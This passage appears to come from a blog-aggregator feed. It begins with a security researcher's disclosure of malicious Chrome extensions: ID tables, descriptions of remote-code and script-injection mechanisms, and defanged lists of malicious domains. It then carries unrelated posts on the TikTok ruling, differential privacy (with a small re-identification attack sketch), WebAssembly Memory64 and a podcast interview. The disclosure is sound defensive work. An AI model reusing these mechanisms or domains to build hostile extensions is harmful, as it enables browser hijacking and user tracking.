TikTok in USA 20,000 bgcmndidjhfimbbocplkapiaaokhlcac
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi
Access to Odnoklassniki 4,000 ccaieagllbdljoabpdjiafjedojoejcl
Ghost - Anonymous Stories for Instagram 20,000 cdpeckclhmpcancbdihdfnfcncafaicp
StorySpace Manager for FB and IG Stories 10,000 cicohiknlppcipjbfpoghjbncojncjgb
VPN Unblocker for YouTube 40,000 cnodohbngpblpllnokiijcpnepdmfkgm
Universal Video Downloader 200,000 cogmkaeijeflocngklepoknelfjpdjng
Free privacy connection - VPN guru 500,000 dcaffjpclkkjfacgfofgpjbmgjnjlpmh
Live Recorder for Instagram aka MasterReco 10,000 djngbdfelbifdjcoclafcdhpamhmeamj
Video Downloader for Vimeo 100,000 dkiipfbcepndfilijijlacffnlbchigb
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab
Insured Smart VPN - Best Proxy ever unblock everything 2,000 idoimknkimlgjadphdkmgocgpbkjfoch
Ultra Downloader for Instagram 30,000 inekcncapjijgfjjlkadkmdgfoekcilb
Parental Control. Blocks porn, malware, etc. 3,000 iohpehejkbkfdgpfhmlbogapmpkefdej
UlV. Ultimate downloader for Vimeo 2,000 jpoobmnmkchgfckdlbgboeaojhgopidn
Simplify. Downloader for Instagram 20,000 kceofhgmmjgfmnepogjifiomgojpmhep
Download Facebook Video 591 kdemfcffpjfikmpmfllaehabkgkeakak
VPN Unblocker for Facebook 3,000 kheajjdamndeonfpjchdmkpjlemlbkma
Video Downloader for FaceBook 90,000 kjnmedaeobfmoehceokbmpamheibpdjj
TikTok Video Keeper 40,000 kmobjdioiclamniofdnngmafbhgcniok
Mass Downloader for Instagram 100,000 ldoldiahbhnbfdihknppjbhgjngibdbe
Stories for FaceBook - Anon view, download 3,000 nfimgoaflmkihgkfoplaekifpeicacdn
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc
TikTok Video Downloader 20,000 oaceepljpkcbcgccnmlepeofkhplkbih
Video Downloader for FaceBook 10,000 ododgdnipimbpbfioijikckkgkbkginh
Exta: Pro downloader for Instagram 10,000 ppcmpaldbkcoeiepfbkdahoaepnoacgd

Bonus section: more malicious extensions

Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.

As is often the case with Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them have also devised their own mechanisms to execute remote code. I didn’t find more extensions using the same approach, which of course doesn’t mean that there are none.

Adblock for Youtube is yet another browser extension essentially bundling an interpreter for their very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other in the content script context.

EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective server. EasyNav also removes security headers. These extensions don’t bother with HTML injection however, instead their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.

Download Manager Integration Checklist is merely supposed to display some instructions, it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and will add rules to the declarativeNetRequest API that it downloads from its server.

Translator makes it look like its configuration is all about downloading a list of languages. But it also contains a regular expression to test against website addresses and the instructions on what to do with matching websites: a tag name of the element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. This mechanism could just as well be used to inject a script however.

The affected extensions

Name Weekly active users Extension ID Featured
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo
EasyNav 30,000 aobeidoiagedbcogakfipippifjheaom
Adblock Bear - stop invasive ads 100,000 gdiknemhndplpgnnnjjjhphhembfojec
AdBlock 360 400,000 ghfkgecdjkmgjkhbdpjdhimeleinmmkl
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj

IOCs

The following domain names are associated with Phoenix Invicta:

  • 1-click-cp[.]com
  • adblock-ads-and-yt[.]pro
  • agadata[.]online
  • anysearch[.]guru
  • anysearchnow[.]info
  • astatic[.]site
  • astato[.]online
  • astralink[.]click
  • best-browser-extensions[.]com
  • better-color-picker[.]guru
  • betterfind[.]online
  • capture-it[.]online
  • chrome-settings[.]online
  • click-and-pick[.]pro
  • color-picker-quick[.]info
  • customcursors[.]online
  • dailyview[.]site
  • datalocked[.]online
  • dmext[.]online
  • dopni[.]com
  • doublestat[.]info
  • doubleview[.]online
  • easy-dark-mode[.]online
  • emojikeyboard[.]site
  • everyview[.]info
  • fasterbrowser[.]online
  • fastertabs[.]online
  • findmanual[.]org
  • fivem[.]com[.]tr
  • fixfind[.]online
  • font-expert[.]pro
  • freestikers[.]top
  • freetabmemory[.]online
  • get-any-manual[.]pro
  • get-manual[.]info
  • getresult[.]guru
  • good-ship[.]com
  • gulkayak[.]com
  • isstillalive[.]com
  • kralforum[.]com[.]tr
  • locodata[.]site
  • lottingem[.]com
  • manual-finder[.]site
  • manuals-viewer[.]info
  • megaboost[.]site
  • nocodata[.]online
  • ntdataview[.]online
  • picky-ext[.]pro
  • pocodata[.]pro
  • readtxt[.]pro
  • rumorpix[.]com
  • screencapx[.]co
  • searchglobal[.]online
  • search-protection[.]org
  • searchresultspage[.]online
  • shurkul[.]online
  • skipadsplus[.]online
  • skip-all-ads[.]info
  • skip-n-watch[.]info
  • skippy[.]pro
  • smartsearch[.]guru
  • smartsearch[.]top
  • socialtab[.]top
  • soundbooster[.]online
  • speechit[.]pro
  • super-sound-booster[.]info
  • tabmemoptimizer[.]site
  • taboptimizer[.]com
  • text-speecher[.]online
  • topodat[.]info
  • triplestat[.]online
  • true-sound-booster[.]online
  • ufind[.]site
  • video-downloader-click-save[.]online
  • video-downloader-plus[.]info
  • vipoisk[.]ru
  • vipsearch[.]guru
  • vipsearch[.]top
  • voicereader[.]online
  • websiteconf[.]online
  • youtube-ads-skip[.]site
  • ystatic[.]site

The following domain names are used by Netflix Party and related extensions:

  • abforbrowser[.]com
  • autorefresh[.]co
  • autorefreshplus[.]in
  • getmatchingcouponsanddeals[.]info
  • pipextension[.]com
  • smartadblocker[.]com
  • telenetflixparty[.]com
  • ytadblock[.]com
  • ytadskip[.]com

The following domain names are used by Sweet VPN and related extensions:

  • analyticsbatch[.]com
  • aquafreevpn[.]com
  • batchindex[.]com
  • browserdatahub[.]com
  • browserlisting[.]com
  • checkbrowserer[.]com
  • countstatistic[.]com
  • estimatestatistic[.]com
  • metricbashboard[.]com
  • proxy-config[.]com
  • qippin[.]com
  • realtimestatistic[.]com
  • secondstatistic[.]com
  • securemastervpn[.]com
  • shceduleuser[.]com
  • statisticindex[.]com
  • sweet-vpn[.]com
  • timeinspection[.]com
  • traficmetrics[.]com
  • trafficreqort[.]com
  • ultimeo-downloader[.]com
  • unbansocial[.]com
  • userestimate[.]com
  • virtualstatist[.]com
  • webstatscheck[.]com

These domain names are used by the extensions in the bonus section:

  • adblock-360[.]com
  • easynav[.]net
  • internetdownloadmanager[.]top
  • privacy-bear[.]net
  • skipads-ytb[.]com
  • translatories[.]com

Don Marti: Supreme Court files confusing bug report

I’m still an Internet optimist despite…things…so I was hoping that Friday’s Supreme Court opinion in the TikTok case would have some useful information about how to design online social networking in a way that does get First Amendment protection, even if TikTok doesn’t. But no. Considered as a bug report, the opinion doesn’t help much. We basically got (1) TikTok collects lots of personal info (2) Congress gets to decide if and how it’s a national security problem to make personal info available to a foreign adversary, and so TikTok is banned. But everyone else doing social software, including collaboration software, is going to have a lot to find out for themselves.

The Supreme Court pretty much ignores TikTok’s dreaded For You Page algorithm and focuses on the privacy problem. So we don’t know if some future ban of some hypothetical future app that somehow fixed its data collection issues would hold up in court just based on how it does content recommendations. (Regulating recommendation algorithms is a big issue that I’m not surprised the Court couldn’t agree on in the short time they had for this case.) We also get the following, on p. 9—TikTok got the benefit of the doubt and received some First Amendment consideration that future apps might or might not.

This Court has not articulated a clear framework for determining whether a regulation of non-expressive activity that disproportionately burdens those engaged in expressive activity triggers heightened review. We need not do so here. We assume without deciding that the challenged provisions fall within this category and are subject to First Amendment scrutiny.

Page 11 should be good news for anybody drafting a privacy law anyway. Regulating data collection is content neutral for First Amendment purposes—which should be common sense.

The Government also supports the challenged provisions with a content-neutral justification: preventing China from collecting vast amounts of sensitive data from 170 million U. S. TikTok users. That rationale is decidedly content agnostic. It neither references the content of speech on TikTok nor reflects disagreement with the message such speech conveys….Because the data collection justification reflects a purpos[e] unrelated to the content of expression, it is content neutral.

The outbound flow of data from people in the USA is what makes the TikTok ban hold up in court. Prof. Eric Goldman writes that the ban is taking advantage of a privacy pretext for censorship, which is definitely something to watch out for in future privacy laws, but doesn’t apply in this case.

But so far the to-do list for future apps looks manageable.

  • Don’t surveil US users for a foreign adversary

  • Comply with whatever future restrictions on recommendation algorithms turn out to hold up in court. (Disclosure of rules or source code? Allow users to switch to chronological? Allow client-side or peer-to-peer filtering and scoring? Lots of options but possible to get out ahead of.)

Not so fast. Here’s the hard part. According to the Court the problem is not just the info that the app collects automatically and surreptitiously, or the user actions it records, but also the info that users send by some deliberate action. On page 14:

If, for example, a user allows TikTok access to the user’s phone contact list to connect with others on the platform, TikTok can access any data stored in the user’s contact list, including names, contact information, contact photos, job titles, and notes. Access to such detailed information about U. S. users, the Government worries, may enable China to track the locations of Federal employees and contractors, build dossiers of personal information for blackmail, and conduct corporate espionage.

and in Justice Gorsuch’s concurrence,

According to the Federal Bureau of Investigation, TikTok can access any data stored in a consenting user’s contact list—including names, photos, and other personal information about unconsenting third parties. Ibid. (emphasis added). And because the record shows that the People’s Republic of China (PRC) can require TikTok’s parent company to cooperate with [its] efforts to obtain personal data, there is little to stop all that information from ending up in the hands of a designated foreign adversary.

On the one hand, yes, sharing contacts does transfer a lot of information about people in the USA to TikTok. But sharing a contact list with an app can work a lot of different ways. It can be

  1. covert surveillance (although mobile platforms generally do their best to prevent this)

  2. data sharing that you get tricked into

  3. deliberate, more like choosing to email a copy of the company directory as an attachment

If it’s really a problem to enable a user to choose to share contact info, then that makes running collaboration software like GitHub in China a problem from the USA side. (Git repositories are full of metadata about who works on what, with who. And that information is processed by other users, by the platform itself, and by third-party tools.) Other content creation tools also share the kinds of info on skills and work relationships that would be exactly what a foreign adversary murder robot needs to prioritize targets. But the user, not some surveillance software, generally puts that info there. If intentional contact sharing by users is part of the reason that the USA can ban TikTok, what does that mean for other kinds of user-to-user communication?

Kleptomaniac princesses

There’s a great story I read when I was a kid that I wish I had the citation for. It might be fictional, but I’m going to summarize it anyway because it’s happening again.

Once upon a time there was a country that the UK really, really wanted to maintain good diplomatic relations with. The country was in a critical strategic location and had some kind of natural resources or something, I don’t remember the details. The problem, though, was that the country was a monarchy, and one of the princesses loved to visit London and shoplift. And she was really bad at it. So diplomats had to go around to the stores in advance to tell the manager what’s going on, convince the store to let her steal stuff, and promise to settle up afterwards.

Today, the companies that run the surveillance apps are a lot like that princess. (Techbros don’t have masculine energy, they have kleptomaniac princess energy.) If one country really needs to maintain good relations with another, they’ll allow that country’s surveillance apps to get away with privacy shenanigans. If relations get chillier, then normal law enforcement applies. At least for now, though, we don’t know what the normal laws here will look like, and the Supreme Court didn’t provide many hints yesterday.

Related

Big Tech platforms: mall, newspaper, or something else? A case where the Supreme Court did give better instructions (to state legislators, though, not app developers)

In TikTok v. Garland, Supreme Court Sends Good Vibes for Privacy Laws, But Congress’s Targeting of TikTok Alone Won’t Do Much to Protect Privacy by Tom McBrien, EPIC Counsel. The Court’s opinion was also a good sign for privacy advocates because it made clear that regulating data practices is an important and content-neutral regulatory intervention. Tech companies and their allies have long misinterpreted a Supreme Court case called Sorrell v. IMS Health to mean that all privacy laws are presumptively unconstitutional under the First Amendment because information is speech. But the TikTok Court explained that passing a law to protect privacy is decidedly content agnostic because it neither references the content of speech…nor reflects disagreement with the message such speech conveys. In fact, the Court found the TikTok law constitutional specifically on the grounds that it was passed to regulate privacy and emphasized how important the government interest is in protecting Americans’ privacy.

Bonus links

TikTok, AliExpress, SHEIN & Co surrender Europeans’ data to authoritarian China Today, noyb has filed GDPR complaints against TikTok, AliExpress, SHEIN, Temu, WeChat and Xiaomi for unlawful data transfers to China….As none of the companies responded adequately to the complainants’ access requests, we have to assume that this includes China. But EU law is clear: data transfers outside the EU are only allowed if the destination country doesn’t undermine the protection of data.

Total information collapse by Carole Cadwalladr It was the open society that enabled Zuckerberg to build his company, that educated his engineers and created a modern scientific country that largely obeyed the rules-based order. But that’s over. And, this week is a curtain raiser for how fast everything will change. Zuckerberg took a smashing ball this week to eight years’ worth of “trust and safety” work that has gone into trying to make social media a place fit for humans. That’s undone in a single stroke.

Lawsuit: Allstate used GasBuddy and other apps to quietly track driving behavior by Kevin Purdy. (But which of the apps running tracking software are foreign-owned? Because you can register an LLC in many states anonymously, it’s impossible to tell.)

Baltic Leadership in Brussels: What the New High Representative Kaja Kallas Means for Tech Policy | TechPolicy.Press by Sophie L. Vériter. [O]nline platforms and their users are affected by EU foreign policy through counter-disinformation regulations aimed at addressing foreign threats of interference and manipulation. Indeed, technology is increasingly considered a matter of security in the EU, which means that the HRVP may well have a significant impact on the digital space within and beyond the EU.

The Ministry of Empowerment by danah boyd. This isn’t about shareholder value. It’s about a kayfabe war between tech demagogues vying to be the most powerful boy in the room.

As Australia bans social media for kids under 16, age-assurance tech is in the spotlight by Natasha Lomas (more news from the splinternet)

The Mozilla Blog: Raising the bar: Why differential privacy is at the core of Anonym’s approach

Continuing our series on Anonym’s technology, this post focuses on Anonym’s use of differential privacy. Differential privacy is a cornerstone of Anonym’s approach to building confidential and effective data solutions. In this post, we’ll explain why we integrate differential privacy (DP) into all our systems and share how we tailor our implementation to meet the unique demands of advertising use cases.

As a reminder, Mozilla acquired Anonym over the summer of 2024, as a key pillar in its effort to raise the standards of privacy in the advertising industry. Separate from Mozilla surfaces like Firefox, which work to protect users from excessive data collection, Anonym provides ad tech infrastructure that focuses on improving privacy and limiting data shared between advertisers and ad platforms. 

What is differential privacy?

 Created in 2006 by Cynthia Dwork and her collaborators, DP provides a principled method to generate insights without compromising individual confidentiality. This is typically achieved by adding carefully calibrated statistical noise to computations, making individual data points indistinguishable. 

Differential privacy has been used in a number of different contexts to enhance user privacy, notably in the US Census and for public health use cases. This post will focus on why Anonym believes DP is an essential tool in how we create performance with our partners, while preserving privacy. For those interested in learning more about the theoretical underpinnings of DP, we’ve linked some of our favorite resources at the end of this post.
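
As a toy illustration of the core idea (not Anonym’s actual implementation), here is how a simple count query can be protected with Laplace noise:

// Sample from a Laplace distribution with scale b (inverse-CDF method)
function laplace(b) {
  const u = Math.random() - 0.5;
  return -b * Math.sign(u) * Math.log(1 - 2 * Math.abs(u));
}

// A count query has sensitivity 1: adding or removing one person
// changes the true result by at most 1.
function dpCount(trueCount, epsilon) {
  return trueCount + laplace(1 / epsilon);
}

dpCount(9, 0.5); // e.g. 7.3 – any individual’s contribution is hidden in the noise

Smaller values of epsilon mean more noise and stronger privacy; larger values mean more accurate results.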

Why differential privacy for advertising use cases?

Simply put, we believe that differential privacy offers improved privacy to users while allowing analysis on ad performance. Many traditional privacy techniques used in advertising are at high risk of exposing user data, even if inadvertently. One of the most common traditional techniques is only returning aggregates when more than a minimum number of users have contributed (thresholding). The two examples below illustrate where thresholding can still result in revealing user data. 

Example 1: In attribution reporting, measuring partially overlapping groups can reveal individual user information. Imagine a dataset that provides attribution data segmented by age group, and we have implemented a threshold of ten – meaning we will only provide reporting if we have at least ten conversions for the segment. Suppose there are only nine purchasers in the “18-20” age group. Thresholding might suppress this entire segment to protect privacy. However, if a larger, overlapping group—such as users exposed to ads targeted at users aged 18 to 35—is reported, and this larger group contains just one more user than the suppressed segment, it becomes relatively straightforward to deduce that the additional user is a purchaser. This demonstrates how thresholding alone can unintentionally expose individual data by leaving related groups visible.

Example 2: Imagine a clean room that consistently suppresses results for aggregations with fewer than ten individuals but always reports statistics for groups with ten or more. An attacker could introduce minor changes to the input data—such as adding a single individual—and observe how the output changes. By monitoring these changes, the attacker could reverse-engineer the behavior of the individual added.
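
The second attack can be sketched in a few lines; the threshold, data and helper names are made up:

// Exact counts with a minimum-size threshold of 10, no noise
const report = count => count >= 10 ? count : null;
const purchasersIn = people => people.filter(p => p.purchased).length;

// `group` contains 9 purchasers; `target` is the person under attack
report(purchasersIn(group));              // null: suppressed
report(purchasersIn([...group, target])); // 10: reported
// The flip from suppressed to reported tells the attacker that target is a
// purchaser (and that the original group sat at exactly 9).

Differential privacy defeats this kind of attack: with noise calibrated to single-person changes, the two outputs become statistically almost indistinguishable.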

The FTC has recently shared its perspective that relying purely on confidential computing by using data clean rooms may not adequately protect people’s privacy and we agree – users need more protection than afforded by simple aggregation and thresholding.

The advantages of differential privacy

Differential privacy offers several key improvements over the methods discussed above:

  1. Mathematical guarantees: Differential privacy provides quantifiable and provable mathematical guarantees about the confidentiality of individuals in a dataset, ensuring that the risk of revealing individual-level information is reduced. Additionally, DP has a concept called composability, which means that even if we look at a large number of results over time, we can still quantify the total privacy loss.
  2. Protection from auxiliary information: DP ensures that even if a party such as an ad platform possesses additional information about users (which is typically the case), they cannot confidently identify specific individuals from the dataset.
  3. Minimal impact on utility: When implemented well, the actionability of DP-protected outputs is comparable to results without DP, and there is no need to suppress results. This means advertisers can trust their data to inform decision-making without compromising individual user confidentiality.

With these benefits, DP offers better privacy guarantees than other methods. We don’t need to think through all the potential edge cases like we saw for thresholding. For advertisers and platforms, the choice is clear: why wouldn’t you want the strongest available privacy protection?

How Anonym implements differential privacy

At Anonym, we recognize that one-size-fits-all solutions rarely work, especially in the complex world of advertising. That’s why all our DP implementations are bespoke to the ad platform and designed to maximize utility for each of their advertiser use cases.

Tailoring DP to the problem

Our approach takes into account the unique requirements of each advertising campaign. We use differential privacy for our ML-based solutions, but let’s use a measurement example:

  • Measurement goals: Are we measuring the number of purchases, the amount purchased, or both? We only want to release the necessary information to maximize utility.  
  • Decision context: What metrics matter most to the advertiser? In a lift study, that could be understanding incrementality vs. statistical significance. We can tailor what we return to meet the advertiser’s needs. This increases utility by avoiding the release of information that will not change decision-making.
  • Dimensional complexity: What dimensions are we trying to measure? Is there a hierarchy? We can improve utility by taking advantage of underlying data structures.

High utility DP requires expertise

To create solutions that are both private and actionable, our development process involves close collaboration between our teams of differential privacy experts and advertising experts.

Differential privacy experts play a crucial role in ensuring the mathematical correctness of implementations. This is a critical step because DP guarantees are only valid if implemented correctly. These DP experts carefully match the DP method to the specific problem, selecting the option that offers the highest utility. Additionally, these experts incorporate the latest innovations in DP to further enhance the effectiveness and practicality of the solutions.

Advertising experts, on the other hand, help ensure the base ads algorithms are optimized to deliver high-utility results. Their insights further optimize DP methods for decision-making, aligning the outputs with the specific needs of advertisers.

This multidisciplinary approach helps our solutions meet rigorous mathematical privacy standards while empowering advertisers to make effective, data-driven decisions.

Conclusion

In an era of increasing data collection and heightened privacy concerns, differential privacy is a key technique for protecting the confidentiality of individual data without sacrificing utility. At Anonym, we’ve built DP into the foundation of our systems because we believe it’s the best way to deliver actionable insights while safeguarding user trust.

By combining deep expertise in DP with a nuanced understanding of advertising, we’re able to offer solutions that meet the needs of advertisers, regulators, and, most importantly, people.

Further Reading: Check out our favorite resources to learn more about differential privacy:

The post Raising the bar: Why differential privacy is at the core of Anonym’s approach appeared first on The Mozilla Blog.

SpiderMonkey Development Blog: Is Memory64 actually worth using?

After many long years, the Memory64 proposal for WebAssembly has finally been released in both Firefox 134 and Chrome 133. In short, this proposal adds 64-bit pointers to WebAssembly.

If you are like most readers, you may be wondering: “Why wasn’t WebAssembly 64-bit to begin with?” Yes, it’s the year 2025 and WebAssembly has only just added 64-bit pointers. Why did it take so long, when 64-bit devices are the majority and 8GB of RAM is considered the bare minimum?

It’s easy to think that 64-bit WebAssembly would run better on 64-bit hardware, but unfortunately that’s simply not the case. WebAssembly apps tend to run slower in 64-bit mode than they do in 32-bit mode. This performance penalty depends on the workload, but it can range from just 10% to over 100%—a 2x slowdown just from changing your pointer size.

This is not simply due to a lack of optimization. Instead, the performance of Memory64 is restricted by hardware, operating systems, and the design of WebAssembly itself.

What is Memory64, actually?

To understand why Memory64 is slower, we first must understand how WebAssembly represents memory.

When you compile a program to WebAssembly, the result is a WebAssembly module. A module is analogous to an executable file, and contains all the information needed to bootstrap and run a program, including:

  • A description of how much memory will be necessary (the memory section)
  • Static data to be copied into memory (the data section)
  • The actual WebAssembly bytecode to execute (the code section)

These are encoded in an efficient binary format, but WebAssembly also has an official text syntax used for debugging and direct authoring. This article will use the text syntax. You can convert any WebAssembly module to the text syntax using tools like WABT (wasm2wat) or wasm-tools (wasm-tools print).

Here’s a simple but complete WebAssembly module that allows you to store and load an i32 at address 16 of its memory.

(module
  ;; Declare a memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i32.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i32.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)
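
For context, this is roughly how you would instantiate and call the module from JavaScript, assuming wasmBytes holds the binary produced by a tool like wat2wasm:

const { instance } = await WebAssembly.instantiate(wasmBytes);
instance.exports.storeAt16(42);
console.log(instance.exports.loadFrom16()); // 42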

Now let’s modify the program to use Memory64:

(module
  ;; Declare an i64 memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory i64 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i64.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i64.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

You can see that our memory declaration now includes i64, indicating that it uses 64-bit addresses. We therefore also change i32.const 16 to i64.const 16. That’s it. This is pretty much the entirety of the Memory64 proposal.

How is memory implemented?

So why does this tiny change make a difference for performance? We need to understand how WebAssembly engines actually implement memories.

Thankfully, this is very simple. The host (in this case, a browser) simply allocates memory for the WebAssembly module using a system call like mmap or VirtualAlloc. WebAssembly code is then free to read and write within that region, and the host (the browser) ensures that WebAssembly addresses (like 16) are translated to the correct address within the allocated memory.

However, WebAssembly has an important constraint: accessing memory out of bounds will trap, analogous to a segmentation fault (segfault). It is the host’s job to ensure that this happens, and in general it does so with bounds checks. These are simply extra instructions inserted into the machine code on each memory access—the equivalent of writing if (address >= memory.length) { trap(); } before every single load². You can see this in the actual x64 machine code generated by SpiderMonkey for an i32.load³:

  movq 0x08(%r14), %rax       ;; load the size of memory from the instance (%r14)
  cmp %rax, %rdi              ;; compare the address (%rdi) to the limit
  jb .load                    ;; if the address is ok, jump to the load
  ud2                         ;; trap
.load:
  movl (%r15,%rdi,1), %eax    ;; load an i32 from memory (%r15 + %rdi)

These instructions have several costs! Besides taking up CPU cycles, they require an extra load from memory, they increase the size of machine code, and they take up branch predictor resources. But they are critical for ensuring the security and correctness of WebAssembly code.
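
In JavaScript terms, each checked access behaves roughly like the following sketch (purely illustrative; engines emit the machine code shown above rather than anything like this):

const mem = new WebAssembly.Memory({ initial: 1 }); // 1 page = 64KiB
const view = new DataView(mem.buffer);

function checkedLoadI32(addr) {
  // The equivalent of the cmp/jb/ud2 sequence above
  if (addr > view.byteLength - 4) throw new WebAssembly.RuntimeError("out of bounds");
  return view.getInt32(addr, true); // WebAssembly memories are little-endian
}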

Unless…we could come up with a way to remove them entirely.

How is memory really implemented?

The maximum possible value for a 32-bit integer is about 4 billion. 32-bit pointers therefore allow you to use up to 4GB of memory. The maximum possible value for a 64-bit integer, on the other hand, is about 18 sextillion, allowing you to use up to 18 exabytes of memory. This is truly enormous, tens of millions of times bigger than the memory in even the most advanced consumer machines today. In fact, because this difference is so great, most “64-bit” devices are actually 48-bit in practice, using just 48 bits of the memory address to map from virtual to physical addresses⁴.

Even a 48-bit address space is enormous: 65,536 times larger than the largest possible 32-bit memory. This gives every process 281 terabytes of address space to work with, even if the device has only a few gigabytes of physical memory.

This means that address space is cheap on 64-bit devices. If you like, you can reserve 4GB of address space from the operating system to ensure that it remains free for later use. Even if most of that memory is never used, this will have little to no impact on most systems.

How do browsers take advantage of this fact? By reserving 4GB of memory for every single WebAssembly module.

In our first example, we declared a 32-bit memory with a size of 64KiB. But if you run this example on a 64-bit operating system, the browser will actually reserve 4GB of memory. The first 64KiB of this 4GB block will be read-write, and the remaining 3.9999GB will be reserved but inaccessible.

By reserving 4GB of memory for all 32-bit WebAssembly modules, it is impossible to go out of bounds. The largest possible pointer value, 2^32-1, will simply land inside the reserved region of memory and trap. This means that, when running 32-bit wasm on a 64-bit system, we can omit all bounds checks entirely⁵.

This optimization is impossible for Memory64. The size of the WebAssembly address space is the same as the size of the host address space. Therefore, we must pay the cost of bounds checks on every access, and as a result, Memory64 is slower.

So why use Memory64?

The only reason to use Memory64 is if you actually need more than 4GB of memory.

Memory64 won’t make your code faster or more “modern”. 64-bit pointers in WebAssembly simply allow you to address more memory, at the cost of slower loads and stores.

The performance penalty may diminish over time as engines make optimizations. Bounds checking strategies can be improved, and WebAssembly compilers may be able to eliminate some bounds checks at compile time. But it is impossible to beat the absolute removal of all bounds checks found in 32-bit WebAssembly.

Furthermore, the WebAssembly JS API constrains memories to a maximum size of 16GB. This may be quite disappointing for developers used to native memory limits. Unfortunately, because WebAssembly makes no distinction between “reserved” and “committed” memory, browsers cannot freely allocate large quantities of memory without running into system commit limits.
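
As a rough illustration of how commit limits can surface (a sketch; exact behavior varies by engine and operating system), growing a memory may fail at runtime even below its declared maximum, because the OS may refuse to commit the additional pages:

// Sizes are in 64KiB wasm pages; 65536 pages = 4GiB.
const mem = new WebAssembly.Memory({ initial: 1, maximum: 65536 });
try {
  mem.grow(16384); // request 1GiB more (16384 pages × 64KiB)
} catch (e) {
  // RangeError: either past `maximum` or the engine could not allocate the pages
  console.log("grow failed:", e);
}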

Still, being able to access 16GB is very useful for some applications. If you need more memory, and can tolerate worse performance, then Memory64 might be the right choice for you.

Where can WebAssembly go from here? Memory64 may be of limited use today, but there are some exciting possibilities for the future:

  • Bounds checks could be better supported in hardware in the future. There has already been some research in this direction—for example, see this 2023 paper by Narayan et al. With the growing popularity of WebAssembly and other sandboxed VMs, this could be a very impactful change that improves performance while also eliminating the wasted address space from large reservations. (Not all WebAssembly hosts can spend their address space as freely as browsers.)

  • The memory control proposal for WebAssembly, which I co-champion, is exploring new features for WebAssembly memory. While none of the current ideas would remove the need for bounds checks, they could take advantage of virtual memory hardware to enable larger memories, more efficient use of large address spaces (such as reduced fragmentation for memory allocators), or alternative memory allocation techniques.

Memory64 may not matter for most developers today, but we think it is an important stepping stone to an exciting future for memory in WebAssembly.


  1. The rest of the proposal fleshes out the i64 mode, for example by modifying instructions like memory.fill to accept either i32 or i64 depending on the memory’s address type. The proposal also adds an i64 mode to tables, which are the primary mechanism used for function pointers and indirect calls. For simplicity, they are omitted from this post. 

  2. In practice the instructions may actually be more complicated, as they also need to account for integer overflow, offset, and align. 

  3. If you’re using the SpiderMonkey JS shell, you can try this yourself by using wasmDis(func) on any exported WebAssembly function. 

  4. Some hardware now also supports addresses larger than 48 bits, such as Intel processors with 57-bit addresses and 5-level paging, but this is not yet commonplace. 

  5. In practice, a few extra pages beyond 4GB will be reserved to account for offset and align, called “guard pages”. We could reserve another 4GB of memory (8GB in total) to account for every possible offset on every possible pointer, but in SpiderMonkey we instead choose to reserve just 32MiB + 64KiB for guard pages and fall back to explicit bounds checks for any offsets larger than this. (In practice, large offsets are very uncommon.) For more information about how we handle bounds checks on each supported platform, see this SMDOC comment (which seems to be slightly out of date), these constants, and this Ion code. It is also worth noting that we fall back to explicit bounds checks whenever we cannot use this allocation scheme, such as on 32-bit devices or resource-constrained mobile phones. 

The Mozilla BlogSlate’s ICYMI hosts on their online obsessions and wildest 2025 predictions

Candice Lim and Kate Lindsay are the hosts of ICYMI, Slate’s podcast about internet culture.

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.

This month, we chat with Candice Lim of Slate’s internet culture podcast, ICYMI, and her new cohost, Kate Lindsay, about their first online obsessions, internet hot takes and predictions for 2025.

What is your favorite corner of the internet? 

Kate: My group chat. I’m a full-time lurker on platforms like TikTok, to the point where I have time limits on my phone, but when it comes to actually participating in the discourse or sharing my life, I now only do it in a space where I’m pretty sure everyone likes me.

Candice: There’s this TikTok account called @petunia_rocks, and it’s run by a college student who voices a stuffed hippo named Petunia. Her account is full of cute little things like Petunia’s nighttime routine, Petunia cold-calling frat guys, Petunia going to her grandparents’ house for Thanksgiving. And Petunia has a very cute voice, but she also has this adorable growl (hmmmmph!) that I use in my daily life all the time. I stan Petunia and she does, indeed, rock.

What is an internet deep dive that you can’t wait to jump back into?

Kate: I want to know what happened to the 2010s-era YouTube BritCrew. Almost all still post but not all are still friends, and I need to know what some think of the direction that others have taken…

Candice: I have a few that I check in on every year: What’s the nature of Mindy Kaling and BJ Novak’s relationship, what finally made Charli XCX break up with her ex-boyfriend Huck, what really caused Aaron Rodgers and Shailene Woodley to call off their engagement, what is the hour-by-hour timeline of Olivia Munn and John Mulaney getting together, what really happened when Edith Zimmerman profiled Chris Evans for GQ, and was there an actual love triangle between Olivia Rodrigo, Sabrina Carpenter, and Joshua Bassett.

What is the one tab you always regret closing?

